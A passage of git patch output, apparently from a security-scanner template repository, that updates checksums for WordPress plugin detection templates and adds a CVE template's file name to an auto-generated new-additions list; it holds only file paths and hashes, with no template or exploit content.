-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
-http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
-http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
+http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7076,7 +7077,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:ba21f9d07ed57b21a54259b1e007c24d2dd41e97
+templates-checksum.txt:5705b51b55059d177ea9a5fea172cbd2032fdad4
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 24b5b1c57ec08cae83ab833640c2fad02c6052c0 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 09:51:01 +0000
Subject: [PATCH 0422/1090] Auto Generated New Template Addition List [Mon Sep
 18 09:51:01 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 90432fc2a0..6f40471da4 100644
--- a/.new-additions
+++ b/.new-additions
@@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-30943.yaml
 http/cves/2023/CVE-2023-37629.yaml
 http/cves/2023/CVE-2023-39676.yaml
 http/cves/2023/CVE-2023-39677.yaml
+http/cves/2023/CVE-2023-41892.yaml
 http/cves/2023/CVE-2023-4714.yaml
 http/exposed-panels/dbgate-panel.yaml
 http/exposed-panels/phpldapadmin-panel.yaml

